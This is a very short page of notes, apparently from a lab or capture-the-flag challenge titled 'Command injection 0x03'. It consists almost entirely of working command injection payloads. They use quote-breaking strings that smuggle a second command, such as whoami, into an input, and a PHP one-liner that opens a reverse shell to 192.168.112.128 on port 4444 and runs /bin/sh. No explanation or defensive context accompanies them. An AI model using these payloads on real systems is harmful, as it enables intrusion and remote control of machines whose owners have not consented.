Command injection 0x03 [Challenge]
' ; php -r '$sock=fsockopen("192.168.112.128",4444);exec("/bin/sh -i <&3 >&3 2>&3");' ; '


OR other way
123)^2))}'; whoami ; #

123)^2))}'; php -r '$sock=fsockopen("192.168.112.128",4444);exec("/bin/sh -i <&3 >&3 2>&3");' ; #
Last updated